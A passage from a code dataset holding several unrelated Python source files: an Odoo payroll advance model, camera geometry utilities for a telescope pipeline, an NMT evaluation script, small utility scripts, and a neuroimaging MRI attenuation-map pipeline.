fields.Float(\n string=u'Taux',\n digits=dp.get_precision('Account'),\n compute='_compute_rates',\n store=True,\n )\n plafond_salariale = fields.Float(\n string=u'Plafond exonération',\n digits=dp.get_precision('Account'),\n required=True,\n default=0)\n plafond_patronale = fields.Float(\n string=u'Plafond taxable',\n digits=dp.get_precision('Account'),\n required=True,\n default=0)\n contribution_id = fields.Many2one(\n 'hr.contribution.register', string=u'Contribution',)\n\n plafond_salariale_type = fields.Selection([\n ('fix', 'Fixe'),\n ('rate', 'Taux sur la base'),\n ], string=u'Type du plafond salarial',)\n\n plafond_patronale_type = fields.Selection([\n ('fix', 'Fixe'),\n ('rate', 'Taux sur la base'),\n ], string=u'Type de plafond patronale',)\n\n show_on_payslip = fields.Selection([\n ('never', 'Jamais'),\n ('ifnotnull', 'Si différent du zéro'),\n ('always', 'Toujours'),\n ], string=u'Affichage sur les bulletins', required=True, default='ifnotnull')\n\n\n show_on_ledger = fields.Selection([\n ('never', 'Jamais'),\n ('ifnotnull', 'Si différent du zéro'),\n ('always', 'Toujours'),\n ], string=u'Affichage dans le livre de paie', required=True, default='ifnotnull')\n\n is_retained = fields.Boolean(\n string=u'Est une base de l\\'IR', default=True)\n can_reset = fields.Boolean(string=u'Peut être réinitialisé', default=False)\n can_request = fields.Boolean(string=u'Peut être demandé', default=False)\n instant_move = fields.Boolean(string=u'Générer l\\'écriture comptable instantanément', default=True)\n\n analytic_account_id = fields.Many2one(\n 'account.analytic.account', string=u'Compte analytique',)\n account_tax_id = fields.Many2one('account.tax', string=u'Code TVA',)\n account_debit = fields.Many2one(\n 'account.account', string=u'Compte du débit')\n account_credit = fields.Many2one(\n 'account.account', string=u'Compte du crédit')\n\n interest_rate = fields.Float(\n string=u'Taux d\\'intérêt', digits=dp.get_precision('Account'), default=0)\n\n csv_erase = fields.Boolean(string=u'Écraser les données par les données du fichier CSV', default=False,)\n export_ok = fields.Boolean(string=u'Export/Import CSV', default=True,)\n active = fields.Boolean(string=u'Actif', default=True, )\n\n @api.model\n def create(self, vals):\n avance_id = super(hr_avance, self).create(vals)\n self.env['hr.axe'].create({'avance_id': avance_id.id})\n return avance_id\n\n @api.multi\n def write(self, vals):\n res = super(hr_avance, self).write(vals)\n for avance in self:\n axes = self.env['hr.axe'].search(\n [('avance_id', '=', avance.id)])\n if axes:\n for axe in axes:\n axe.sudo().write({'avance_id': avance.id})\n else:\n axes.create({'avance_id': avance.id})\n return res\n\n @api.multi\n def unlink(self):\n for avance in self:\n axes = self.env['hr.axe'].search(\n [('avance_id', '=', avance.id)])\n if axes:\n for axe in axes:\n axe.unlink()\n return super(hr_avance, self).unlink()\n","sub_path":"l10n_ma_hr_payroll/models/avance.py","file_name":"avance.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158000265","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Utilities for reading or working with Camera geometry files\n\nTODO:\n-----\n\n - don't use `namedtuple` for CameraGeometry, since it's immutable and thus is\n pass-by-value (which could be slow).\n\n\"\"\"\nfrom collections import namedtuple\n\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.table import Table\nfrom scipy.spatial import cKDTree as KDTree\n\nfrom .files import get_file_type\nfrom ctapipe.utils.datasets import get_path\n\n\n__all__ = ['CameraGeometry',\n 'get_camera_geometry',\n 'load_camera_geometry_from_file',\n 'make_rectangular_camera_geometry',\n 'find_neighbor_pixels', 'guess_camera_geometry',\n ]\n\n\n# dictionary to convert number of pixels to camera type for use in\n# guess_camera_geometry\n_npix_to_type = {2048: ('SST', 'rectangular'),\n 1141: ('MST', 'hexagonal'),\n 1855: ('LST', 'hexagonal'),\n 11328: ('SST', 'rectangular')}\n\n\nCameraGeometry = namedtuple(\"CameraGeometry\",\n ['cam_id', 'pix_id',\n 'pix_x', 'pix_y',\n 'pix_area',\n 'neighbors',\n 'pix_type'])\n\"\"\"Camera geometry.\n\nTODO: describe a bit what this is ...\n\"\"\"\n\n\ndef find_neighbor_pixels(pix_x, pix_y, rad):\n \"\"\"use a KD-Tree to quickly find nearest neighbors of the pixels in a\n camera. This function can be used to find the neighbor pixels if\n they are not already present in a camera geometry file.\n\n Parameters\n ----------\n pix_x : array_like\n x position of each pixel\n pix_y : array_like\n y position of each pixels\n rad : float\n radius to consider neighbor it should be slightly larger\n than the pixel diameter.\n\n Returns\n -------\n array of neighbor indices in a list for each pixel\n\n \"\"\"\n\n points = np.array([pix_x, pix_y]).T\n indices = np.arange(len(pix_x))\n kdtree = KDTree(points)\n neighbors = [kdtree.query_ball_point(p, r=rad) for p in points]\n for nn, ii in zip(neighbors, indices):\n nn.remove(ii) # get rid of the pixel itself\n return neighbors\n\n\ndef guess_camera_type(npix):\n global _npix_to_type\n return _npix_to_type.get(npix, ('unknown', 'hexagonal'))\n\n\n@u.quantity_input\ndef guess_camera_geometry(pix_x: u.m, pix_y: u.m):\n \"\"\" returns a CameraGeometry filled in from just the x,y positions \"\"\"\n\n rad = 0.5 * \\\n np.sqrt((pix_x[1] - pix_x[0]) ** 2 + (pix_y[1] - pix_y[0]) ** 2)\n\n cam_id, pix_type = guess_camera_type(len(pix_x))\n\n return CameraGeometry(cam_id=cam_id,\n pix_id=np.arange(len(pix_x)),\n pix_x=pix_x,\n pix_y=pix_y,\n pix_area=np.pi * np.ones_like(pix_x) * rad ** 2,\n neighbors=find_neighbor_pixels(pix_x.value, pix_y.value,\n rad.value + 0.01),\n pix_type=pix_type)\n\n\ndef get_camera_geometry(instrument_name, cam_id, recalc_neighbors=True):\n \"\"\"Helper function to provide the camera geometry definition for a\n camera by name.\n\n Parameters\n ----------\n instrument_name : {'hess'}\n name of instrument\n cam_id : int\n identifier of camera, in case of multiple versions\n recalc_neighbors : bool\n if True, recalculate the neighbor pixel list, otherwise\n use what is in the file\n\n Returns\n -------\n a `CameraGeometry` object\n\n Examples\n --------\n\n >>> geom_ct1 = get_camera_geometry( \"hess\", 1 )\n >>> neighbors_pix_1 = geom_ct1.pix_id[geom_ct1.neighbors[1]]\n \"\"\"\n\n # let's assume the instrument name is encoded in the\n # filename\n name = instrument_name.lower()\n geomfile = get_path('{}_camgeom.fits.gz'.format(name))\n\n geom = load_camera_geometry_from_file(cam_id, geomfile=geomfile)\n neigh_list = geom['PIX_NEIG'].data\n neigh = np.ma.masked_array(neigh_list, neigh_list < 0),\n\n # put them all in units of M (conversions are automatic)\n xx = u.Quantity(geom['PIX_POSX'], u.m)\n yy = u.Quantity(geom['PIX_POSY'], u.m)\n dd = u.Quantity(geom['PIX_DIAM'], u.m)\n aa = u.Quantity(geom['PIX_AREA'], u.m ** 2)\n\n if recalc_neighbors is True:\n neigh = find_neighbor_pixels(xx.value, yy.value,\n (dd.mean() + 0.01 * u.m).value)\n\n return CameraGeometry(\n cam_id=cam_id,\n pix_id=np.array(geom['PIX_ID']),\n pix_x=xx,\n pix_y=yy,\n pix_area=aa,\n neighbors=neigh,\n pix_type='hexagonal'\n )\n\n\ndef load_camera_geometry_from_file(cam_id, geomfile='chercam.fits.gz'):\n filetype = get_file_type(geomfile)\n if filetype == 'fits':\n return _load_camera_geometry_from_fits_file(cam_id, geomfile)\n\n\ndef _load_camera_geometry_from_fits_file(cam_id, geomfile='chercam.fits.gz'):\n \"\"\"\n Read camera geometry from a FITS file with a ``CHERCAM`` extension.\n\n Parameters\n ----------\n\n cam_id : int\n ID number of camera in the fits file\n geomfile : str\n FITS file containing camera geometry in ``CHERCAM`` extension\n\n Returns\n -------\n\n a `CameraGeometry` object\n\n \"\"\"\n camtable = Table.read(geomfile, hdu=\"CHERCAM\")\n geom = camtable[camtable['CAM_ID'] == cam_id]\n return geom\n\n\ndef make_rectangular_camera_geometry(npix_x=40, npix_y=40,\n range_x=(-0.5, 0.5), range_y=(-0.5, 0.5)):\n \"\"\"Generate a simple camera with 2D rectangular geometry.\n\n Used for testing.\n\n Parameters\n ----------\n npix_x : int\n number of pixels in X-dimension\n npix_y : int\n number of pixels in Y-dimension\n range_x : (float,float)\n min and max of x pixel coordinates in meters\n range_y : (float,float)\n min and max of y pixel coordinates in meters\n\n Returns\n -------\n CameraGeometry object\n\n \"\"\"\n bx = np.linspace(range_x[0], range_x[1], npix_x)\n by = np.linspace(range_y[0], range_y[1], npix_y)\n xx, yy = np.meshgrid(bx, by)\n xx = xx.ravel() * u.m\n yy = yy.ravel() * u.m\n\n ids = np.arange(npix_x * npix_y)\n rr = np.ones_like(xx).value * (xx[1] - xx[0]) / 2.0\n nn = find_neighbor_pixels(xx.value, yy.value,\n rad=(rr.mean() * 2.001).value)\n return CameraGeometry(\n cam_id=-1,\n pix_id=ids,\n pix_x=xx * u.m,\n pix_y=yy * u.m,\n pix_area=(2 * rr) ** 2,\n neighbors=nn,\n pix_type='rectangular')\n","sub_path":"ctapipe/io/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"296276797","text":"import torch\nfrom tqdm import tqdm\nfrom train_super import create_model\nfrom configuration import setup_config\nfrom utils import load_vocabularies, load_data, create_prev, clean_sentences, compute_bleu, save_hypotheses\nfrom joeynmt import data\nfrom joeynmt.batch import Batch\nfrom modules.search import beam_search\nimport sacrebleu\nfrom torch.utils.data import DataLoader\nfrom data_prep import BucketingParallelDataLoader, create_batch, batch_to_sentences\nfrom data_prep.constants import UNK_TOKEN, PAD_TOKEN, SOS_TOKEN, EOS_TOKEN\nimport numpy as np\n\ndef main():\n config = setup_config()\n config[\"dev_prefix\"] = \"comparable\"\n vocab_src, vocab_tgt = load_vocabularies(config)\n _, dev_data, _ = load_data(config, vocab_src=vocab_src, vocab_tgt=vocab_tgt)\n\n model, _, validate_fn = create_model(vocab_src, vocab_tgt, config)\n model.to(torch.device(config[\"device\"]))\n\n checkpoint_path = \"{}/cond_nmt_de-en_run_7/checkpoints/cond_nmt_de-en_run_7\".format(config[\"out_dir\"])\n\n state = torch.load(checkpoint_path)\n model.load_state_dict(state['state_dict'])\n\n model.eval()\n device = torch.device(\"cpu\") if config[\"device\"] == \"cpu\" else torch.device(\"cuda:0\")\n with torch.no_grad():\n model_hypotheses = []\n references = []\n\n val_dl = DataLoader(dev_data, batch_size=config[\"batch_size_eval\"],\n shuffle=False, num_workers=4)\n # val_dl = BucketingParallelDataLoader(val_dl)\n for sentences_x, sentences_y in tqdm(val_dl):\n\n sentences_x = np.array(sentences_x)\n seq_len = np.array([len(s.split()) for s in sentences_x])\n sort_keys = np.argsort(-seq_len)\n sentences_x = sentences_x[sort_keys]\n # #\n sentences_y = np.array(sentences_y)\n\n x_in, _, x_mask, x_len = create_batch(sentences_x, vocab_src, device)\n x_mask = x_mask.unsqueeze(1)\n\n if config[\"model_type\"] == \"aevnmt\":\n qz = model.inference(x_in, x_mask, x_len)\n z = qz.mean\n\n enc_output, enc_hidden = model.encode(x_in, x_len, z)\n dec_hidden = model.init_decoder(enc_output, enc_hidden, z)\n\n raw_hypothesis = beam_search(model.decoder, model.emb_tgt,\n model.generate_tm, enc_output, dec_hidden, x_mask, vocab_tgt.size(),\n vocab_tgt[SOS_TOKEN], vocab_tgt[EOS_TOKEN],\n vocab_tgt[PAD_TOKEN], config)\n else:\n enc_output, enc_hidden = model.encode(x_in, x_len)\n dec_hidden = model.decoder.initialize(enc_output, enc_hidden)\n\n raw_hypothesis = beam_search(model.decoder, model.emb_tgt,\n model.generate_tm, enc_output, dec_hidden, x_mask, vocab_tgt.size(),\n vocab_tgt[SOS_TOKEN], vocab_tgt[EOS_TOKEN],\n vocab_tgt[PAD_TOKEN], config)\n\n hypothesis = batch_to_sentences(raw_hypothesis, vocab_tgt)\n\n inverse_sort_keys = np.argsort(sort_keys)\n model_hypotheses += hypothesis[inverse_sort_keys].tolist()\n\n references += sentences_y.tolist()\n save_hypotheses(model_hypotheses, 0, config, None)\n model_hypotheses, references = clean_sentences(model_hypotheses, references, config)\n bleu = sacrebleu.raw_corpus_bleu(model_hypotheses, [references]).score\n print(bleu)\n\nif __name__ == '__main__':\n main()\n","sub_path":"coaevnmt/back_super_de-en.py","file_name":"back_super_de-en.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109533573","text":"y=input()\ny=int(y)\na2=[]\nfor j in range(0,y): \n n1=input()\n a2.append(n1)\nf1=[]\nfor j in zip(*a2):\n if j.count(j[0])==len(j): \n f1.append(j[0])\n else:\n break\nprint(''.join(f1))\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"127738185","text":"import os\nimport json\nimport xml.etree.ElementTree as et\nimport errno\nfrom strippers import strip_extension\n\n\n### This file should be probably be made into a class as its quite messy to define the find_object_category function inside of the main(). ###\n\ndef main():\n ### directories ###\n dir_path = os.path.dirname(os.path.realpath(__file__))\n object_path = dir_path.replace('/Documentation/Max Documentation', '/FrameLib_Max_Objects')\n raw_xml_path = f'{dir_path}/RawXML'\n move_to_path = dir_path.replace('/Documentation/Max Documentation', '/Current Test Version/FrameLib/docs/refpages')\n category_database_path = f'{dir_path}/category_database.json'\n\n ### Load the category_database.json ###\n with open(category_database_path) as raw_json:\n category_database = json.load(raw_json)\n \n ### Get category of file ###\n def find_object_category(obj_string):\n for key in category_database:\n category_object_list = category_database[key] \n for obj in category_object_list:\n if obj == obj_string:\n return key\n\n raw_xml_list = os.listdir(raw_xml_path) #make a list with all the raw xml files in them\n\n ### Complex find and replace ###\n for i in range(len(raw_xml_list)):\n if raw_xml_list[i] != '.DS_Store': #filter out annoying hidden files\n raw_xml_file_path = f'{raw_xml_path}/{raw_xml_list[i]}' #make a raw file path to load the list somewhere\n obj_name = strip_extension(raw_xml_list[i], 2) #just get the file name\n category = find_object_category(obj_name) #get the category of the object name\n tree = et.parse(raw_xml_file_path) #parse the xml file\n root = tree.getroot() #get root and assign to root var\n root.set('category', category) #set category attribute of root to the category found in json\n ### This replaces the meta data tag. It produces a lot of errors which are filtered by the try/except structure but it should be changed to something else ###\n if category != None:\n for elem in root.getiterator(): #for all the elements in the root of the xml tree\n try:\n elem.text = elem.text.replace('!@#@#$', category) #try to replace specific text with category found in json\n except AttributeError:\n pass #else pass because it will throw some errors\n if not os.path.exists(f'{move_to_path}/{category}'):\n try:\n os.makedirs(f'{move_to_path}/{category}')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise # if directory is made between os.path.exists and os.makedirs calls this will fail with an OSError. This raises an error to warn the user rather than pushing on\n\n tree.write(f'{move_to_path}/{category}/{raw_xml_list[i]}') #write the xml file out\n","sub_path":"Documentation/Max Documentation/edit_raw_XML.py","file_name":"edit_raw_XML.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"501460828","text":"from constants import *\nimport Generator\n\nclass World(object):\n\n def __init__(self, dimensions=(100, 100)):\n self.dimensions = dimensions\n self.layers = {}\n self.generator = Generator.Generator()\n\n for layer_name in self.generator.generation_order:\n self.add_layer(layer_name)\n\n def add_layer(self, layer_name, contents=None):\n if contents == None:\n self.layers[layer_name] = self.generator.generate(layer_name, self.dimensions, self.layers)\n else:\n self.layers[layer_name] = contents\n\n def get_value(self, x, y, layer_name):\n result = 0\n\n if layer_name in self.layers and self.within_bounds(x, y):\n result = self.layers[layer_name][x][y]\n\n return result\n\n def get_values(self, x, y, layer_names=None):\n if layer_names == None:\n layer_names = self.layers.keys()\n\n return {layer_name: self.get_value(x, y, layer_name) for layer_name in layer_names}\n\n def add_values(self, x, y, args):\n if self.within_bounds(x, y):\n for layer_name in args:\n if not(self.layers.has_key(layer_name)):\n self.add_layer(layer_name)\n\n self.layers[layer_name][x][y] += args[layer_name]\n\n def set_values(self, x, y, args):\n if self.within_bounds(x, y):\n for layer_name in args:\n if not(self.layers.has_key(layer_name)):\n self.add_layer(layer_name)\n\n self.layers[layer_name][x][y] = args[layer_name]\n\n def within_bounds(self, x, y):\n result = False\n if x >= 0 and x < self.dimensions[0] and y >= 0 and y < self.dimensions[1]:\n result = True\n\n return result\n","sub_path":"wogan/World.py","file_name":"World.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"7450459","text":"from ..base import MRIStudy\nfrom arcana.study.base import StudyMetaClass\nfrom arcana.dataset import DatasetSpec, FieldSpec\nfrom nipype.interfaces.fsl.preprocess import FLIRT, ApplyXFM\nfrom nipype.interfaces.fsl.utils import ConvertXFM, Smooth\nfrom nipype.interfaces.fsl.maths import (\n UnaryMaths, BinaryMaths, MultiImageMaths, Threshold)\nfrom nipype.interfaces.spm.preprocess import NewSegment\nfrom nipype.interfaces.utility.base import Select\nfrom nianalysis.interfaces.umap_calc import CoreUmapCalc\nfrom nianalysis.interfaces.converters import Nii2Dicom\nfrom nianalysis.interfaces.mrtrix.utils import MRConvert\nfrom arcana.interfaces.utils import (\n CopyToDir, ListDir, dicom_fname_sort_key)\nfrom arcana.study.multi import (\n MultiStudy, SubStudySpec, MultiStudyMetaClass)\nfrom nianalysis.citation import (\n fsl_cite, spm_cite, matlab_cite)\nfrom nianalysis.file_format import (\n dicom_format, nifti_gz_format, nifti_format, text_matrix_format,\n directory_format, text_format)\nfrom nianalysis.requirement import (\n fsl5_req, spm12_req, matlab2015_req)\nfrom nianalysis.interfaces.custom.motion_correction import (\n MotionMatCalculation)\nfrom arcana.parameter import ParameterSpec\n\n\nclass UTEStudy(MRIStudy, metaclass=StudyMetaClass):\n\n add_data_specs = [\n DatasetSpec('umap', dicom_format),\n DatasetSpec('umap_nifti', nifti_gz_format,\n 'umap_dcm2nii_conversion_pipeline'),\n DatasetSpec('brain', nifti_gz_format, 'brain_extraction_pipeline'),\n DatasetSpec('ute_echo1', dicom_format),\n DatasetSpec('ute_echo2', dicom_format),\n DatasetSpec('umap_ute', dicom_format),\n DatasetSpec('ute1_registered', nifti_gz_format,\n 'registration_pipeline'),\n DatasetSpec('ute2_registered', nifti_gz_format,\n 'registration_pipeline'),\n DatasetSpec('template_to_ute_mat', text_matrix_format,\n 'registration_pipeline'),\n DatasetSpec('ute_to_template_mat', text_matrix_format,\n 'registration_pipeline'),\n DatasetSpec('air_mask', nifti_gz_format,\n 'segmentation_pipeline'),\n DatasetSpec('bones_mask', nifti_gz_format,\n 'segmentation_pipeline'),\n DatasetSpec('sute_cont_template', nifti_gz_format,\n 'umaps_calculation_pipeline'),\n DatasetSpec('sute_fix_template', nifti_gz_format,\n 'umaps_calculation_pipeline'),\n DatasetSpec('sute_fix_ute', nifti_gz_format,\n 'backwrap_to_ute_pipeline'),\n DatasetSpec('sute_cont_ute', nifti_gz_format,\n 'backwrap_to_ute_pipeline')]\n\n add_parameter_specs = [\n ParameterSpec('bet_method', 'optibet',\n choices=MRIStudy.parameter_spec('bet_method').choices)]\n\n template_path = '/home/jakubb/template/template_template0.nii.gz'\n tpm_path = '/environment/packages/spm/12/tpm/head_tpm.nii'\n\n def header_info_extraction_pipeline(self, **kwargs):\n return (super(UTEStudy, self).\n header_info_extraction_pipeline_factory(\n 'primary', **kwargs))\n\n def umap_dcm2nii_conversion_pipeline(self, **kwargs):\n return super(UTEStudy, self).dcm2nii_conversion_pipeline_factory(\n 'umap_dcm2nii', 'umap', **kwargs)\n\n def registration_pipeline(self, **kwargs): # @UnusedVariable @IgnorePep8\n \"\"\"\n Register T1 and T2 to the\n\n Parameters\n ----------\n \"\"\"\n pipeline = self.create_pipeline(\n name='registration_pipeline',\n inputs=[DatasetSpec('ute_echo1', dicom_format),\n DatasetSpec('ute_echo2', dicom_format)],\n outputs=[DatasetSpec('ute1_registered', nifti_format),\n DatasetSpec('ute2_registered', nifti_gz_format),\n DatasetSpec('template_to_ute_mat', text_matrix_format),\n DatasetSpec('ute_to_template_mat', text_matrix_format)],\n desc=\"Register ute images to the template\",\n version=1,\n citations=(fsl_cite),\n **kwargs)\n\n echo1_conv = pipeline.create_node(MRConvert(), name='echo1_conv')\n echo1_conv.inputs.out_ext = '.nii.gz'\n\n pipeline.connect_input('ute_echo1', echo1_conv, 'in_file')\n\n echo2_conv = pipeline.create_node(MRConvert(), name='echo2_conv')\n echo2_conv.inputs.out_ext = '.nii.gz'\n\n pipeline.connect_input('ute_echo2', echo2_conv, 'in_file')\n\n # Create registration node\n registration = pipeline.create_node(\n FLIRT(), name='ute1_registration',\n requirements=[fsl5_req], wall_time=180)\n\n pipeline.connect(\n echo1_conv,\n 'out_file',\n registration,\n 'in_file')\n\n registration.inputs.reference = self.template_path\n registration.inputs.output_type = 'NIFTI_GZ'\n registration.inputs.searchr_x = [-180, 180]\n registration.inputs.searchr_y = [-180, 180]\n registration.inputs.searchr_z = [-180, 180]\n registration.inputs.bins = 256\n registration.inputs.cost_func = 'corratio'\n\n # Inverse matrix conversion\n convert_mat = pipeline.create_node(\n ConvertXFM(), name='inverse_matrix_conversion',\n requirements=[fsl5_req], wall_time=10)\n pipeline.connect(\n registration,\n 'out_matrix_file',\n convert_mat,\n 'in_file')\n convert_mat.inputs.invert_xfm = True\n\n # UTE_echo_2 transformation\n transform_ute2 = pipeline.create_node(\n ApplyXFM(), name='transform_t2',\n requirements=[fsl5_req], wall_time=10)\n pipeline.connect(\n registration,\n 'out_matrix_file',\n transform_ute2,\n 'in_matrix_file')\n pipeline.connect(\n echo2_conv,\n 'out_file',\n transform_ute2,\n 'in_file')\n\n transform_ute2.inputs.output_type = 'NIFTI_GZ'\n transform_ute2.inputs.reference = self.template_path\n transform_ute2.inputs.apply_xfm = True\n\n # Connect outputs\n pipeline.connect_output('ute1_registered', registration, 'out_file')\n pipeline.connect_output(\n 'ute_to_template_mat',\n registration,\n 'out_matrix_file')\n pipeline.connect_output('ute2_registered', transform_ute2, 'out_file')\n pipeline.connect_output('template_to_ute_mat', convert_mat, 'out_file')\n pipeline.assert_connected()\n\n return pipeline\n\n def segmentation_pipeline(self, **kwargs): # @UnusedVariable @IgnorePep8\n\n pipeline = self.create_pipeline(\n name='ute1_segmentation',\n inputs=[DatasetSpec('ute1_registered', nifti_format)],\n outputs=[DatasetSpec('air_mask', nifti_gz_format),\n DatasetSpec('bones_mask', nifti_gz_format)],\n desc=\"Segmentation of the first echo UTE image\",\n version=1,\n citations=(spm_cite, matlab_cite),\n **kwargs)\n\n segmentation = pipeline.create_node(\n NewSegment(), name='ute1_registered_segmentation',\n requirements=[matlab2015_req, spm12_req], wall_time=480)\n pipeline.connect_input(\n 'ute1_registered',\n segmentation,\n 'channel_files')\n segmentation.inputs.affine_regularization = 'none'\n tissue1 = ((self.tpm_path, 1), 1, (True, False), (False, False))\n tissue2 = ((self.tpm_path, 2), 1, (True, False), (False, False))\n tissue3 = ((self.tpm_path, 3), 2, (True, False), (False, False))\n tissue4 = ((self.tpm_path, 4), 3, (True, False), (False, False))\n tissue5 = ((self.tpm_path, 5), 4, (True, False), (False, False))\n tissue6 = ((self.tpm_path, 6), 3, (True, False), (False, False))\n segmentation.inputs.tissues = [\n tissue1,\n tissue2,\n tissue3,\n tissue4,\n tissue5,\n tissue6]\n\n select_bones_pm = pipeline.create_node(\n Select(), name='select_bones_pm_from_SPM_new_segmentation',\n requirements=[], wall_time=5)\n pipeline.connect(\n segmentation,\n 'native_class_images',\n select_bones_pm,\n 'inlist')\n select_bones_pm.inputs.index = 3\n\n select_air_pm = pipeline.create_node(\n Select(), name='select_air_pm_from_SPM_new_segmentation',\n requirements=[], wall_time=5)\n\n pipeline.connect(\n segmentation,\n 'native_class_images',\n select_air_pm,\n 'inlist')\n select_air_pm.inputs.index = 5\n\n threshold_bones = pipeline.create_node(\n Threshold(), name='bones_probabilistic_map_thresholding',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(select_bones_pm, 'out', threshold_bones, 'in_file')\n threshold_bones.inputs.output_type = \"NIFTI_GZ\"\n threshold_bones.inputs.direction = 'below'\n threshold_bones.inputs.thresh = 0.2\n\n binarize_bones = pipeline.create_node(\n UnaryMaths(), name='bones_probabilistic_map_binarization',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n threshold_bones,\n 'out_file',\n binarize_bones,\n 'in_file')\n binarize_bones.inputs.output_type = \"NIFTI_GZ\"\n binarize_bones.inputs.operation = 'bin'\n\n threshold_air = pipeline.create_node(\n Threshold(), name='air_probabilistic_maps_thresholding',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(select_air_pm, 'out', threshold_air, 'in_file')\n threshold_air.inputs.output_type = \"NIFTI_GZ\"\n threshold_air.inputs.direction = 'below'\n threshold_air.inputs.thresh = 0.1\n\n binarize_air = pipeline.create_node(\n UnaryMaths(), name='air_probabilistic_map_binarization',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(threshold_air, 'out_file', binarize_air, 'in_file')\n binarize_air.inputs.output_type = \"NIFTI_GZ\"\n binarize_air.inputs.operation = 'bin'\n\n pipeline.connect_output('bones_mask', binarize_bones, 'out_file')\n pipeline.connect_output('air_mask', binarize_air, 'out_file')\n pipeline.assert_connected()\n\n return pipeline\n\n def umaps_calculation_pipeline(self, **kwargs):\n\n pipeline = self.create_pipeline(\n name='core_umaps_calculation',\n inputs=[DatasetSpec('ute1_registered', nifti_gz_format),\n DatasetSpec('ute2_registered', nifti_gz_format),\n DatasetSpec('air_mask', nifti_gz_format),\n DatasetSpec('bones_mask', nifti_gz_format)],\n outputs=[DatasetSpec('sute_cont_template', nifti_gz_format),\n DatasetSpec('sute_fix_template', nifti_gz_format)],\n desc=\"Umaps calculation in the template space\",\n version=1,\n citations=(matlab_cite),\n **kwargs)\n\n umaps_calculation = pipeline.create_node(\n CoreUmapCalc(), name='umaps_calculation_based_on_masks_and_r2star',\n requirements=[matlab2015_req], wall_time=20)\n pipeline.connect_input(\n 'ute1_registered',\n umaps_calculation,\n 'ute1_reg')\n pipeline.connect_input(\n 'ute2_registered',\n umaps_calculation,\n 'ute2_reg')\n pipeline.connect_input('air_mask', umaps_calculation, 'air__mask')\n pipeline.connect_input('bones_mask', umaps_calculation, 'bones__mask')\n\n pipeline.connect_output(\n 'sute_cont_template',\n umaps_calculation,\n 'sute_cont_template')\n pipeline.connect_output(\n 'sute_fix_template',\n umaps_calculation,\n 'sute_fix_template')\n pipeline.assert_connected()\n\n return pipeline\n\n def backwrap_to_ute_pipeline(self, **kwargs):\n\n pipeline = self.create_pipeline(\n name='backwrap_to_ute',\n inputs=[DatasetSpec('ute1_registered', nifti_gz_format),\n DatasetSpec('ute_echo1', dicom_format),\n DatasetSpec('umap_ute', dicom_format),\n DatasetSpec('template_to_ute_mat', text_matrix_format),\n DatasetSpec('sute_cont_template', nifti_gz_format),\n DatasetSpec('sute_fix_template', nifti_gz_format)],\n outputs=[DatasetSpec('sute_cont_ute', nifti_gz_format),\n DatasetSpec('sute_fix_ute', nifti_gz_format)],\n desc=\"Moving umaps back to the UTE space\",\n version=1,\n citations=(matlab_cite),\n **kwargs)\n\n echo1_conv = pipeline.create_node(MRConvert(), name='echo1_conv')\n echo1_conv.inputs.out_ext = '.nii.gz'\n pipeline.connect_input('ute_echo1', echo1_conv, 'in_file')\n\n umap_conv = pipeline.create_node(MRConvert(), name='umap_conv')\n umap_conv.inputs.out_ext = '.nii.gz'\n pipeline.connect_input('umap_ute', umap_conv, 'in_file')\n\n zero_template_mask = pipeline.create_node(\n BinaryMaths(), name='zero_template_mask',\n requirements=[fsl5_req], wall_time=3)\n pipeline.connect_input(\n 'ute1_registered',\n zero_template_mask,\n 'in_file')\n zero_template_mask.inputs.operation = \"mul\"\n zero_template_mask.inputs.operand_value = 0\n zero_template_mask.inputs.output_type = 'NIFTI_GZ'\n\n region_template_mask = pipeline.create_node(\n FLIRT(), name='region_template_mask',\n requirements=[fsl5_req], wall_time=5)\n region_template_mask.inputs.apply_xfm = True\n region_template_mask.inputs.bgvalue = 1\n region_template_mask.inputs.interp = 'nearestneighbour'\n region_template_mask.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(\n zero_template_mask,\n 'out_file',\n region_template_mask,\n 'in_file')\n pipeline.connect(\n echo1_conv,\n 'out_file',\n region_template_mask,\n 'reference')\n pipeline.connect_input('template_to_ute_mat', region_template_mask,\n 'in_matrix_file')\n\n fill_in_umap = pipeline.create_node(MultiImageMaths(),\n name='fill_in_umap',\n requirements=[fsl5_req],\n wall_time=3)\n fill_in_umap.inputs.op_string = \"-mul %s \"\n fill_in_umap.inputs.output_type = 'NIFTI_GZ'\n pipeline.connect(region_template_mask, 'out_file',\n fill_in_umap, 'in_file')\n pipeline.connect(\n umap_conv,\n 'out_file',\n fill_in_umap,\n 'operand_files')\n\n sute_fix_ute_space = pipeline.create_node(\n FLIRT(), name='sute_fix_ute_space',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n echo1_conv,\n 'out_file',\n sute_fix_ute_space,\n 'reference')\n pipeline.connect_input('template_to_ute_mat', sute_fix_ute_space,\n 'in_matrix_file')\n pipeline.connect_input('sute_fix_template', sute_fix_ute_space,\n 'in_file')\n sute_fix_ute_space.inputs.apply_xfm = True\n sute_fix_ute_space.inputs.bgvalue = 0\n sute_fix_ute_space.inputs.output_type = 'NIFTI_GZ'\n\n sute_cont_ute_space = pipeline.create_node(\n FLIRT(), name='sute_cont_ute_space',\n requirements=[fsl5_req], wall_time=5)\n pipeline.connect(\n echo1_conv,\n 'out_file',\n sute_cont_ute_space,\n 'reference')\n 